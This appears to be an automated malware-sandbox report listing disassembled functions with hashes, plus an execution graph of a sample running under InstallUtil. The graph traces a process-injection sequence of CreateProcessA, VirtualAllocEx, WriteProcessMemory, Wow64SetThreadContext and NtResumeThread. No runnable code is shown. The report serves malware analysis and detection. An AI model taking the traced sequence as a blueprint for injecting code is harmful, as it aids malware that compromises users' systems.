                                                • Opcode ID: c08248896081c10954b13678a0b4b042596ae1df9625fe2f1a3fcc93c7045a5d
                                                • Instruction ID: 5a43ba4fb7d9d37287a2c07a45d71eb6ae484f2bb9cacf38530f916ce4c2badb
                                                • Opcode Fuzzy Hash: c08248896081c10954b13678a0b4b042596ae1df9625fe2f1a3fcc93c7045a5d
                                                • Instruction Fuzzy Hash: F3312A30604225CFDF15EB74C9546AEB7B6AF49705F500468D80AAB3A4EB76DC42CBA1
                                                Function 02751452 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 422c22455026076a198f1b1ad7577daa9397a1f0377badf4c217efdea1352dde
                                                • Instruction ID: b538b4c597d78c7e9e8a2d2607d2a58d51dff8b48e92925ef60641ff6412b61c
                                                • Opcode Fuzzy Hash: 422c22455026076a198f1b1ad7577daa9397a1f0377badf4c217efdea1352dde
                                                • Instruction Fuzzy Hash: 4021C931A002348FDF21ABB894943ADFBF5EF49315F540479D849EB241EB75C982CB91
                                                Function 027592D1 Relevance: .1, Instructions: 82COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ec5b600913508b03232670b4f40278811413ef483a7a4bf7b1acc211f4f9212
                                                • Instruction ID: 1220bd87cb5ca1ffc22a945a0cf6536dc13348f2072610590c181aa38ef4afbd
                                                • Opcode Fuzzy Hash: 2ec5b600913508b03232670b4f40278811413ef483a7a4bf7b1acc211f4f9212
                                                • Instruction Fuzzy Hash: EF318071E0061ADBDB05DFA4D5906DEF7B2BF89300F108529E905FB395EBB19886CB90
                                                Function 02757059 Relevance: .1, Instructions: 82COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8402b99fba9dcd56cfd9477f9c5fc14235fb6da2742f1aecec2041c9c42e7615
                                                • Instruction ID: 5a10379b262e4b2ce63064247bd4f2a478e228a1fa9c3bbcfaaa6fa6a9035846
                                                • Opcode Fuzzy Hash: 8402b99fba9dcd56cfd9477f9c5fc14235fb6da2742f1aecec2041c9c42e7615
                                                • Instruction Fuzzy Hash: FA2128387102148FCB09EB78D554B6E77A7EBC8714B608468E50A9B3ADCF35EC42CB90
                                                Function 02751667 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f3621726408c7028fa72acdc514a9912fc36e1b907f376163f4b412e07e2162
                                                • Instruction ID: dd2c27630cd688423183451ac06eba897cb1a1abcfd78ab253425cc7cd5b44c3
                                                • Opcode Fuzzy Hash: 9f3621726408c7028fa72acdc514a9912fc36e1b907f376163f4b412e07e2162
                                                • Instruction Fuzzy Hash: 9021F4786081114FDB13A738E8C476A7B7AEB41306F804D65E40EDF1AEDB74D84ACB91
                                                Function 027592E0 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38771bc0d8fc835d1f9217d4f9dde81e34113d92cc353cd7c4d4ef75c69c9528
                                                • Instruction ID: 32f8c63718b6d0491a5ebc9f8a3fe9525167f95ffacf583f00abf40a20978a89
                                                • Opcode Fuzzy Hash: 38771bc0d8fc835d1f9217d4f9dde81e34113d92cc353cd7c4d4ef75c69c9528
                                                • Instruction Fuzzy Hash: 7F216D30E0421ADBDB05DF64D99069EF7B2AF89300F108529E905EB295EBB09886CB90
                                                Function 00ECD3EC Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2321241342.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ecd000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 182c473b066e185e9acfdcef74c6d8ec14dd1d1f0474f0edd7a0b05bd8631ff8
                                                • Instruction ID: da78d2751de7100e26e0b1c0049f5344371e0c4e65100c6df7ba2a624e7194eb
                                                • Opcode Fuzzy Hash: 182c473b066e185e9acfdcef74c6d8ec14dd1d1f0474f0edd7a0b05bd8631ff8
                                                • Instruction Fuzzy Hash: 7C21B0B1508204EFDB19DF14DAC0F26BB65FB98324F24C57DEA091A256C337E856C6A1
                                                Function 02751340 Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 19889181995561153e0a3e1243e8156bb186bd39f2fab1f8ffa5a1e6f11c3399
                                                • Instruction ID: 25542d0a7e19a75da32c5c6a8ef991706631cb60e4304893e2d9d263c34f4d1b
                                                • Opcode Fuzzy Hash: 19889181995561153e0a3e1243e8156bb186bd39f2fab1f8ffa5a1e6f11c3399
                                                • Instruction Fuzzy Hash: A421E1785051608FEF315734E5A436DBB61EB02316F940D6DE80EDB6D1DB798C8AC742
                                                Function 00EDD01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2321403147.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_edd000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31c6523ec73f5aba0f30d5967043741d3f83df2fd1d21f47276dd2ee57b36477
                                                • Instruction ID: 0ec5cc0167875d064a82d9d81ce10361464c70c40e8d73690a628cbabe9cab86
                                                • Opcode Fuzzy Hash: 31c6523ec73f5aba0f30d5967043741d3f83df2fd1d21f47276dd2ee57b36477
                                                • Instruction Fuzzy Hash: 0221F575508200DFCB15DF14DD84B16BB66EBC8314F24C56ED8095B386C33BD807CA61
                                                Function 02751840 Relevance: .1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e0e6df873c96d40052fc8de50613debe9387635c8e76ed8d6cc40e7361da592
                                                • Instruction ID: 645b551627ad00cea2a354bd326a8d5a6c0a538f9df7d855fa27c72b8eb9ff17
                                                • Opcode Fuzzy Hash: 9e0e6df873c96d40052fc8de50613debe9387635c8e76ed8d6cc40e7361da592
                                                • Instruction Fuzzy Hash: C8214C30B00265CFEB25EB34C5557AEB7F6AF49206F5004A8D80AEB360EB769D41CB91
                                                Function 027591E0 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76284e29ecef74a466c826af1d79719b0de017c7f92af2e54086114120fb6c6e
                                                • Instruction ID: b24d09ed0139914d1d7311bf2cd829d2d5c467023fca565cf32d6ed310ec25e9
                                                • Opcode Fuzzy Hash: 76284e29ecef74a466c826af1d79719b0de017c7f92af2e54086114120fb6c6e
                                                • Instruction Fuzzy Hash: 88218734E04619DBDB14CFA5C594A9EF7B2BF89310F10851AED15FB350EBB09845CB90
                                                Function 02751850 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c39210eadd24222d5861cf87fe80c622471346d4f5310e55a385993050b49f88
                                                • Instruction ID: 07268b36cda1d01c3de1c41cb3da61567f588f7dd43db268325b01da0c2fe647
                                                • Opcode Fuzzy Hash: c39210eadd24222d5861cf87fe80c622471346d4f5310e55a385993050b49f88
                                                • Instruction Fuzzy Hash: 93213E30B00269CFDF64EB74C5157AEB7F6AB49206F500468D909EB3A0EB76DD41CB91
                                                Function 02751678 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8a724bdf93917587c99bcb916e530fda78b6808760adf8c586cbd34228f7c34
                                                • Instruction ID: b50f11a17eb2102c5f7f7f9f5d3d7d64201b4f748f9e7eb6ffd6c4f0313431b5
                                                • Opcode Fuzzy Hash: d8a724bdf93917587c99bcb916e530fda78b6808760adf8c586cbd34228f7c34
                                                • Instruction Fuzzy Hash: 5721C0786041128FDF12E728E8C4B19776AEB45711F904D24E40EDF2AEDB74D885CB81
                                                Function 02750838 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8835dd347e3fd81654fc3df5d508b85c383f8340547fdd43e12b67e06809103
                                                • Instruction ID: f53544b36ccb90d8254ac3fd9dbd4ab24d56bca1c47d40ebe1d27ebac3a31fbe
                                                • Opcode Fuzzy Hash: d8835dd347e3fd81654fc3df5d508b85c383f8340547fdd43e12b67e06809103
                                                • Instruction Fuzzy Hash: BA112730A043248FEF215A349842B7DB360EB4A314F10493ED806EF286DBA9EC45CBC1
                                                Function 02750848 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1be22a97d68f3805654ae8763fcbc9d082a6e8d963f6d85685ee9175f7a173b6
                                                • Instruction ID: 291a278dacbee415c949148c85306c455e87f9030169310d9dd565174c4dd386
                                                • Opcode Fuzzy Hash: 1be22a97d68f3805654ae8763fcbc9d082a6e8d963f6d85685ee9175f7a173b6
                                                • Instruction Fuzzy Hash: CF11EB30B002288FEF205A75D846B6DB351EB49310F10493AD406EF345DBB9EC81CBC1
                                                Function 00EDD005 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2321403147.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_edd000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8f896556d5c62e2fb91092142408b02cbc851f217ab811549d4abd00882f1ca
                                                • Instruction ID: f1ad09c961927a6ce585c8fab5928682ab8183f7913c3121f388e5c45b8a6523
                                                • Opcode Fuzzy Hash: a8f896556d5c62e2fb91092142408b02cbc851f217ab811549d4abd00882f1ca
                                                • Instruction Fuzzy Hash: 8021717550D3808FD712CF24D994715BF71EB46314F28C5EBD8498B6A7C33A980ACB62
                                                Function 00ECD3E7 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2321241342.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ecd000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                • Instruction ID: d09269afa2805675363edf607eae52efb12d23fa1f8aab85aa57e98575e517bb
                                                • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                • Instruction Fuzzy Hash: 4411AF76504240DFCB16CF10DAC4B16BF62FB94324F24C5ADD9095B656C33BE85ACBA1
                                                Function 02751460 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f877ba199e51b424c7edea71be696093407a6f7f0f102bf0a05bf4e610b53718
                                                • Instruction ID: 15d2ab3a9ff3f025505c773f2e3adee70271448bc36aaf6f7ae193bac2cfbea8
                                                • Opcode Fuzzy Hash: f877ba199e51b424c7edea71be696093407a6f7f0f102bf0a05bf4e610b53718
                                                • Instruction Fuzzy Hash: D6016931A002248FCF21EFB884443AEBBE5AB48315B64147AD809E7601EB75D942CBA2
                                                Function 02758170 Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25d28ed1109150e8b99cdddbbb18eca636ba0c5eb8a5a145eed1905308bd8267
                                                • Instruction ID: 77041000686d7fdc353150d436fdbb14556131177eab2dc52fb6f32d3a2f6528
                                                • Opcode Fuzzy Hash: 25d28ed1109150e8b99cdddbbb18eca636ba0c5eb8a5a145eed1905308bd8267
                                                • Instruction Fuzzy Hash: E101F2305082499FCB06EBB8FA81ACC7F75EF42300B404A98D0456F1ABDF352E46D781
                                                Function 02758180 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cdf27865caab5abc22d1491be153e5a4b2c5c64159c429a3c7b53ca0172a02d7
                                                • Instruction ID: 3ae6704b4d3407f019881003a3fb40cb0d3313fd8dede3013f4df1d58bb616f5
                                                • Opcode Fuzzy Hash: cdf27865caab5abc22d1491be153e5a4b2c5c64159c429a3c7b53ca0172a02d7
                                                • Instruction Fuzzy Hash: 2EF0F470A14109AFCB05FFB8FA81A9D7BB9EF40700F504568D409BB25AEF316E45DB91

                                                Execution Graph

                                                Execution Coverage:9.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:309
                                                Total number of Limit Nodes:14
                                                execution_graph 61400 6537e32 61401 6537e3c 61400->61401 61405 651b210 61401->61405 61410 651b220 61401->61410 61402 6537e7a 61406 651b235 61405->61406 61415 651b2f3 61406->61415 61420 651b3e2 61406->61420 61407 651b24b 61407->61402 61411 651b235 61410->61411 61413 651b2f3 2 API calls 61411->61413 61414 651b3e2 2 API calls 61411->61414 61412 651b24b 61412->61402 61413->61412 61414->61412 61417 651b315 61415->61417 61416 651b675 61416->61407 61417->61416 61418 6566210 VirtualProtect 61417->61418 61419 6566209 VirtualProtect 61417->61419 61418->61417 61419->61417 61422 651b3e8 61420->61422 61421 651b675 61421->61407 61422->61421 61423 6566210 VirtualProtect 61422->61423 61424 6566209 VirtualProtect 61422->61424 61423->61422 61424->61422 61425 281ca60 61426 281caa6 61425->61426 61429 281d048 61426->61429 61432 281cc9c 61429->61432 61433 281d0b0 DuplicateHandle 61432->61433 61434 281cb93 61433->61434 61435 6537936 61436 6537940 61435->61436 61441 656f7b0 61436->61441 61446 656f780 61436->61446 61450 656f772 61436->61450 61437 653797e 61442 656f763 61441->61442 61443 656f7b6 61441->61443 61444 656f7ab 61442->61444 61454 656f90a 61442->61454 61444->61437 61447 656f795 61446->61447 61448 656f7ab 61447->61448 61449 656f90a 10 API calls 61447->61449 61448->61437 61449->61448 61451 656f780 61450->61451 61452 656f7ab 61451->61452 61453 656f90a 10 API calls 61451->61453 61452->61437 61453->61452 61455 656f912 61454->61455 61456 656f81d 61454->61456 61455->61456 61458 682fc20 61455->61458 61459 682fc35 61458->61459 61463 651f3f3 61459->61463 61469 651f28a 61459->61469 61464 651f397 61463->61464 61465 651f3f6 61463->61465 61474 651f722 61464->61474 61489 651f728 61464->61489 61466 651f3c1 61470 651f294 61469->61470 61472 651f722 10 API calls 61470->61472 61473 651f728 10 API calls 61470->61473 61471 651f3c1 61472->61471 61473->61471 61475 651f73d 61474->61475 61504 6580815 61475->61504 61509 65808e4 61475->61509 61514 6580453 61475->61514 61519 65809d3 61475->61519 61524 6580d51 61475->61524 61529 6580a7f 61475->61529 61533 658047f 61475->61533 61538 65802de 61475->61538 61543 6580b0d 61475->61543 61549 6580c0b 61475->61549 61554 65807b9 61475->61554 61559 6580228 61475->61559 61476 651f75f 61476->61466 61490 651f73d 61489->61490 61492 6580228 2 API calls 61490->61492 61493 65807b9 2 API calls 61490->61493 61494 6580c0b 2 API calls 61490->61494 61495 6580b0d 2 API calls 61490->61495 61496 65802de 2 API calls 61490->61496 61497 658047f 2 API calls 61490->61497 61498 6580a7f 2 API calls 61490->61498 61499 6580d51 2 API calls 61490->61499 61500 65809d3 2 API calls 61490->61500 61501 6580453 2 API calls 61490->61501 61502 65808e4 2 API calls 61490->61502 61503 6580815 2 API calls 61490->61503 61491 651f75f 61491->61466 61492->61491 61493->61491 61494->61491 61495->61491 61496->61491 61497->61491 61498->61491 61499->61491 61500->61491 61501->61491 61502->61491 61503->61491 61505 658081c 61504->61505 61506 658017d 61505->61506 61563 6581609 61505->61563 61568 6581610 61505->61568 61510 658017d 61509->61510 61511 658047f 61509->61511 61591 6565d20 61511->61591 61595 6565d18 61511->61595 61515 65804d0 61514->61515 61516 658017d 61514->61516 61517 6565d20 VirtualAllocEx 61515->61517 61518 6565d18 VirtualAllocEx 61515->61518 61517->61516 61518->61516 61520 65809eb 61519->61520 61599 6565e20 61520->61599 61603 6565e18 61520->61603 61521 6580a2a 61525 6580d6e 61524->61525 61527 6565e20 WriteProcessMemory 61525->61527 61528 6565e18 WriteProcessMemory 61525->61528 61526 6580db9 61527->61526 61528->61526 61607 6582cb8 61529->61607 61612 6582ca7 61529->61612 61530 6580a97 61534 6580489 61533->61534 61536 6565d20 VirtualAllocEx 61534->61536 61537 6565d18 VirtualAllocEx 61534->61537 61535 658017d 61536->61535 61537->61535 61539 65802fa 61538->61539 61541 6565e20 WriteProcessMemory 61539->61541 61542 6565e18 WriteProcessMemory 61539->61542 61540 658017d 61541->61540 61542->61540 61544 6580b1a 61543->61544 61546 658017d 61544->61546 61625 6565fd0 61544->61625 61629 6565fc8 61544->61629 61545 6580c55 61545->61476 61550 6580c2f 61549->61550 61552 6565fd0 NtResumeThread 61550->61552 61553 6565fc8 NtResumeThread 61550->61553 61551 6580c55 61551->61476 61552->61551 61553->61551 61555 65807be 61554->61555 61556 658017d 61555->61556 61557 6581609 2 API calls 61555->61557 61558 6581610 2 API calls 61555->61558 61557->61556 61558->61556 61633 6582e30 61559->61633 61638 6582e20 61559->61638 61560 658017d 61564 6581610 61563->61564 61565 6581649 61564->61565 61573 65817f9 61564->61573 61578 658179d 61564->61578 61565->61506 61569 6581627 61568->61569 61570 6581649 61569->61570 61571 65817f9 2 API calls 61569->61571 61572 658179d 2 API calls 61569->61572 61570->61506 61571->61570 61572->61570 61574 658181e 61573->61574 61583 65655f5 61574->61583 61587 6565600 61574->61587 61579 65817a6 61578->61579 61581 65655f5 CreateProcessA 61579->61581 61582 6565600 CreateProcessA 61579->61582 61580 65819fa 61581->61580 61582->61580 61584 6565600 CreateProcessA 61583->61584 61586 65657ec 61584->61586 61588 6565664 CreateProcessA 61587->61588 61590 65657ec 61588->61590 61592 6565d60 VirtualAllocEx 61591->61592 61594 6565d9d 61592->61594 61594->61510 61596 6565d20 VirtualAllocEx 61595->61596 61598 6565d9d 61596->61598 61598->61510 61600 6565e68 WriteProcessMemory 61599->61600 61602 6565ebf 61600->61602 61602->61521 61604 6565e20 WriteProcessMemory 61603->61604 61606 6565ebf 61604->61606 61606->61521 61608 6582ccd 61607->61608 61617 6565900 61608->61617 61621 65658f8 61608->61621 61609 6582ce6 61609->61530 61613 6582cb8 61612->61613 61615 6565900 Wow64SetThreadContext 61613->61615 61616 65658f8 Wow64SetThreadContext 61613->61616 61614 6582ce6 61614->61530 61615->61614 61616->61614 61618 6565945 Wow64SetThreadContext 61617->61618 61620 656598d 61618->61620 61620->61609 61622 6565900 Wow64SetThreadContext 61621->61622 61624 656598d 61622->61624 61624->61609 61626 6566018 NtResumeThread 61625->61626 61628 656604d 61626->61628 61628->61545 61630 6565fd0 NtResumeThread 61629->61630 61632 656604d 61630->61632 61632->61545 61634 6582e45 61633->61634 61636 6565900 Wow64SetThreadContext 61634->61636 61637 65658f8 Wow64SetThreadContext 61634->61637 61635 6582e5e 61635->61560 61636->61635 61637->61635 61639 6582e30 61638->61639 61641 6565900 Wow64SetThreadContext 61639->61641 61642 65658f8 Wow64SetThreadContext 61639->61642 61640 6582e5e 61640->61560 61641->61640 61642->61640 61297 65b6e1c 61300 65bd618 VirtualProtect 61297->61300 61298 65b6e47 61299 65b37d7 61299->61297 61299->61298 61300->61299 61244 6537ddc 61245 6537de6 61244->61245 61249 6567d28 61245->61249 61253 6567d18 61245->61253 61250 6567d3d 61249->61250 61257 6567f9b 61250->61257 61254 6567d28 61253->61254 61256 6567f9b 2 API calls 61254->61256 61255 6537e24 61256->61255 61259 6567f89 61257->61259 61258 6568098 61259->61258 61260 6566210 VirtualProtect 61259->61260 61261 6566209 VirtualProtect 61259->61261 61260->61259 61261->61259 61301 281a6d0 61302 281a6df 61301->61302 61305 281a7b7 61301->61305 61315 281a7c8 61301->61315 61306 281a7d9 61305->61306 61309 281a7fc 61305->61309 61325 2818a84 61306->61325 61309->61302 61310 281a7f4 61310->61309 61311 281aa00 GetModuleHandleW 61310->61311 61312 281aa2d 61311->61312 61312->61302 61316 281a7d9 61315->61316 61319 281a7fc 61315->61319 61317 2818a84 GetModuleHandleW 61316->61317 61318 281a7e4 61317->61318 61318->61319 61323 281aa51 GetModuleHandleW 61318->61323 61324 281aa60 GetModuleHandleW 61318->61324 61319->61302 61320 281a7f4 61320->61319 61321 281aa00 GetModuleHandleW 61320->61321 61322 281aa2d 61321->61322 61322->61302 61323->61320 61324->61320 61326 281a9b8 GetModuleHandleW 61325->61326 61328 281a7e4 61326->61328 61328->61309 61329 281aa51 61328->61329 61332 281aa60 61328->61332 61330 2818a84 GetModuleHandleW 61329->61330 61331 281aa74 61330->61331 61331->61310 61333 2818a84 GetModuleHandleW 61332->61333 61334 281aa74 61332->61334 61333->61334 61334->61310 61335 2814950 61337 281495e 61335->61337 61338 2814508 61335->61338 61339 2814513 61338->61339 61342 281461c 61339->61342 61341 2814a95 61341->61337 61343 2814627 61342->61343 61346 281464c 61343->61346 61345 2814b7a 61345->61341 61347 2814657 61346->61347 61350 281467c 61347->61350 61349 2814c7c 61349->61345 61351 2814687 61350->61351 61357 2817774 61351->61357 61353 2817a90 61354 2817cb9 61353->61354 61362 281c798 61353->61362 61367 281c797 61353->61367 61354->61349 61358 281777f 61357->61358 61359 281927a 61358->61359 61372 28192c8 61358->61372 61376 28192d8 61358->61376 61359->61353 61363 281c7b9 61362->61363 61364 281c7dd 61363->61364 61380 281c947 61363->61380 61384 281c948 61363->61384 61364->61354 61368 281c7b9 61367->61368 61369 281c7dd 61368->61369 61370 281c947 2 API calls 61368->61370 61371 281c948 2 API calls 61368->61371 61369->61354 61370->61369 61371->61369 61373 281931b 61372->61373 61374 2819326 KiUserCallbackDispatcher 61373->61374 61375 2819350 61373->61375 61374->61375 61375->61359 61377 281931b 61376->61377 61378 2819326 KiUserCallbackDispatcher 61377->61378 61379 2819350 61377->61379 61378->61379 61379->61359 61381 281c955 61380->61381 61383 281c98f 61381->61383 61388 281b500 61381->61388 61383->61364 61385 281c955 61384->61385 61386 281c98f 61385->61386 61387 281b500 2 API calls 61385->61387 61386->61364 61387->61386 61389 281b50b 61388->61389 61391 281d6df 61389->61391 61392 281ccfc 61389->61392 61391->61383 61393 281cd07 61392->61393 61394 281467c 2 API calls 61393->61394 61395 281d717 61394->61395 61395->61389 61643 e9d118 61644 e9d130 61643->61644 61645 e9d18b 61644->61645 61647 65be0d0 61644->61647 61648 65be0f8 61647->61648 61651 65be590 61648->61651 61649 65be11f 61652 65be5bd 61651->61652 61653 65bd618 VirtualProtect 61652->61653 61655 65be753 61652->61655 61654 65be744 61653->61654 61654->61649 61655->61649 61396 65b0909 61397 65b0928 61396->61397 61399 65bd618 VirtualProtect 61397->61399 61398 65b0953 61399->61398 61277 65b8463 61278 65bb4cd 61277->61278 61281 65be988 61278->61281 61282 65be99d 61281->61282 61285 65be9d8 61282->61285 61287 65be9ff 61285->61287 61289 65beae0 61287->61289 61290 65beb20 VirtualAlloc 61289->61290 61292 65bb4f1 61290->61292 61262 65b1141 61265 65bd618 61262->61265 61267 65bd63f 61265->61267 61269 65bda68 61267->61269 61270 65bdab0 VirtualProtect 61269->61270 61272 65b115f 61270->61272 61293 6564ee8 61294 6564f36 NtProtectVirtualMemory 61293->61294 61296 6564f80 61294->61296

                                                Executed Functions

                                                Function 06350288 Relevance: 4.1, Strings: 2, Instructions: 1615COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2347750257.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6350000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq$4'eq
                                                • API String ID: 0-907361030
                                                • Opcode ID: c9643c2f37e8d485a8d08a6ea2a1f0aff354d1f1d584e2881c136116d0eada3e
                                                • Instruction ID: b418b5ce1865eb46c1b8e21e1c2bfdb10608cdd9d2c47c68e9cebfde14e57e65
                                                • Opcode Fuzzy Hash: c9643c2f37e8d485a8d08a6ea2a1f0aff354d1f1d584e2881c136116d0eada3e
                                                • Instruction Fuzzy Hash: 26D2A174D09348DFDB56CBA4C858FAE7FB5EF06300F16809AE501AB392C7795849CBA1
                                                Function 063D0040 Relevance: 2.3, Strings: 1, Instructions: 1081COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 2
                                                • API String ID: 0-450215437
